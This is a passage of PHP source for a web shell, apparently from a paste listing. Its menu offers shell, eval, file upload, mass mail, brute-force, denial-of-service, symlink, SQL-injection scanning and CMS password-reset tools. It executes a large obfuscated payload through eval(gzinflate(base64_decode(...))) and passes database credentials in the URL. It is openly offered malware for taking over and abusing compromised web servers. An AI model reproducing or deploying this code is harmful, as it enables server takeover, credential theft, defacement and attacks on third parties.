  657. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell"> <b>Shell</b></a>
  658. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php"> <b>Eval</b></a>
  659. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql"> <b>MySQL</b></a>
  660. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo"> <b>PHP</b></a>
  661. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit"> <b>NetSploit</b></a>
  662. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload"> <b>Upload</b></a>
  663. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail"> <b>Mail</b></a>
  664. <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute"> <b>BruteForce</b></a>
  665. <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable"> <b>OpenDIR</b></a>
  666. <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos"> <b>D0S</b></a>
  667. <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain"> <b>LocalDomain</b></a>
  668. <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h"> <b>Zone-H</b></a>
  669. <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink"> <b>Symlink</b></a><br><br>
  670. <a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner"> <b>SQLI Scan</b></a>
  671. <a href="?<?php echo "y=".$pwd; ?>&amp;x=web-info"> <b>Website Whois</b></a>
  672. <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-scanner"> <b>Port-Scanner</b></a>
  673. <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset"> <b>WP Reset</b></a>
  674. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset"> <b>Jomlaa Reset</b></a>
  675. <a href="?<?php echo "y=".$pwd; ?>&amp;x=cms-scanner"> <b>CMS Scanner</b></a>
  676. <a href="?<?php echo "y=".$pwd; ?>&amp;x=vb"> <b>VB Changer</b></a>
  677. <a href="?<?php echo "y=".$pwd; ?>&amp;x=about"> <b>About</b></a>
  678. <a href="?x=out"> <b>Log-Out</b></a>
  679. </center>
  680. </div>
  681. <!-- menu end -->
  682.  
  683.  
  684. <?php
  685. if(isset($_GET['x']) && ($_GET['x'] == 'out')) { logout(); }
  686. elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
  687. {
  688. ?>
  689. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  690. <table class="cmdbox">
  691.  
  692. <tr>
  693. <td>
  694. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('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'))); ?></textarea>
  695. </td>
  696. </tr>
  697. <tr>
  698. <td>
  699. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  700. </td>
  701. </tr>
  702. </table>
  703. </form>
  704. <?php
  705. }
  706. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  707. {
  708. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  709. {
  710. $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
  711. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  712. {
  713. $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  714. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  715. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  716. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  717. sqlpass=".$sqlpass."&amp;
  718. sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  719. if(isset($_GET['db']))
